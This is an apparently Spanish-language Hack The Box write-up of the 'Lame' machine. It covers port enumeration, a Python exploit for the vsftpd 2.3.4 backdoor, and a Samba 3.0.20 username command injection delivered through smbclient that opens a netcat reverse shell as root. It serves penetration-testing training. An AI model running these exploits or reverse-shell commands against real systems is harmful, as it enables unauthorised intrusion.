HTB_Lame
Lame {-}
Introduccion {-}
La maquina del dia 20/08/2021 se llama Lame.
El replay del live se puede ver aqui
No olvideis dejar un like al video y un commentario…
Enumeracion {-}
Reconocimiento de maquina, puertos abiertos y servicios {-}
Ping {-}
ping -c 1 10.10.10.3
ttl: 63 -> maquina Linux
Nmap {-}
nmap -p- --open -T5 -v -n 10.10.10.3
Va lento
nmap -sS -p- --open --min-rate 5000 -vvv -n -Pn 10.10.10.3 -oG allPorts
extractPorts allPorts
nmap -sC -sV -p21,22,139,445,3632 10.10.10.3 -oN targeted
Puerto | Servicio | Que se nos occure? | Que falta? |
---|---|---|---|
21 | ftp | Conexion como Anonymous | |
22 | ssh | Conneccion directa | usuario y contraseña |
139 | smbd | Conneccion con Null session | |
445 | smbd | Conneccion con Null session | |
3632 | distccd | Web, Fuzzing |
Conexion Anonymous con ftp {-}
ftp 10.10.10.3
Name: anonymous
Password:
Login successful
ls
Podemos connectar como anonymous pero no nos reporta nada. El resultado de nmap nos da que el vsftpd es de version 2.3.4.
Vulnerability Assessment {-}
vsftpd 2.3.4 {-}
Miramos si existe un exploit para este servicio.
searchsploit vsftpd 2.3.4
Vemos que hay una vulnerabilidad y que existe un exploit. Como el exploit es une exploit Metasploit, vamos buscando por la web si existe otro exploit y la encontramos en cherrera0001 github.
#!/usr/bin/python3
from pwn import log,remote
from sys import argv,exit
from time import sleep
if len(argv) < 2:
exit(f'Usage: {argv[0]} Target_IP')
p = log.progress("Running")
vsftpd = remote(argv[1], 21)
p.status('Checking Version')
recv = vsftpd.recvuntil(")",timeout=5)
version = (recv.decode()).split(" ")[2].replace(")","")
if version != '2.3.4':
exit('2.3.4 Version Not Found')
vsftpd.sendline('USER hii:)')
vsftpd.sendline('PASS hello')
p.status('Backdoor Activated')
sleep(3)
backdoor = remote(argv[1], 6200)
p.success("Got Shell!!!")
backdoor.interactive()
Si lanzamos el script no funcciona, parece ser que la version a sido parcheada -> rabbithole.
SAMBA 3.0.20 {-}
searchsploit samba 3.0.20
Vemos que hay un exploit para Metasploit que permite ejecutar commandos. Examinamos el script con el commando searchsploit -x 16320
y vemos
que podemos injectar commandos desde el nombre de usuario con el formato siguiente
username = "/=`nohup " + payload.encoded + "`"
Vamos a por pruebas
-
Nos ponemos en escucha de trazas ICMP
tcpdump -i tun0 icmp -n
-
Intentamos enviar commandos siguiendo la guia del script
smbclient -L 10.10.10.3 -N --option="client min protocol=NT1" smbclient //10.10.10.3/tmp -N --option="client min protocol=NT1" -c "dir" smbclient //10.10.10.3/tmp -N --option="client min protocol=NT1" smb: \> logon "/='nohup ping -c 1 10.10.14.7'"
Vemos que esto functionna perfectamente. Vamos a ganar accesso al systema.
Vuln exploit & Gaining Access {-}
Ganando accesso desde la vulnerabilidad SAMBA 3.0.20 {-}
-
Nos ponemos en escucha por el puerto 443
nc -nlvp 443
-
Intentamos enviar commandos siguiendo la guia del script
smbclient //10.10.10.3/tmp -N --option="client min protocol=NT1" -c 'logon "/=`nohup nc -e /bin/bash 10.10.14.7 443`"'
Hemos ganado accesso al systema.
Tratamiento de la TTY {-}
script /dev/null -c bash
^Z
stty raw -echo; fg
-> reset
-> xterm
export TERM=xterm
export SHELL=bash
stty -a
stty rows <rownb> columns <colnb>
Dandole a whoami
vemos que ya estamos root ;) No se necessita escalar privilegios en este caso.